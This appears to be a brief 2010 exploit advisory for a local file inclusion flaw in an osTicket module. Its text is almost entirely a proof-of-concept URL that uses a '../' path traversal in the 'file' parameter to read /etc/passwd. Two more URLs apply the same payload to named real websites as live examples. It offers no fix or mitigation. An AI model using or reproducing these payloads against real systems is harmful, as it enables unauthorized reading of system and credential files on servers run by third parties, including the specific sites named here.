osTicket (Open Source Support Ticket System) suffers from a local file inclusion vulnerability.
3797f8f72deb5008eacc5270ae34a4b3d06f0deb3a795a8e932645e5592353e2
[~]----------------------------------------------------------------------------------------------------------------------
[~] osTicket - Open Source Support Ticket System (module=osTicket&file=) Local File Inclusion
[~]
[~] https://osticket.com
[~]
[~]
[~] ----------------------------------------------------------------------------------------
[~] Bug founded by d3v1l [Avram Marius]
[~]
[~] Date: 8.11.2010
[~]
[~]
[~] https://security-sh3ll.blogspot.com | https://twitter.com/securityshell
[~]
[~] ----------------------------------------------------------------------------------------
[~] Poc :-
[~]
[~] https://site.com/module.php?module=osTicket&file=../../../../../../../../../../../../../../etc/passwd
[~]
[~] Ex :-
[~]
[~] https://daemag.com/Support/module.php?module=osTicket&file=../../../../../../../../../../../../../../etc/passwd
[~]
[~] https://hostalvirtual.com/live/module.php?module=osTicket&file=../../../../../../../../../../../../../../etc/passwd
[~]-----------------------------------------------------------------------------------------------------------------------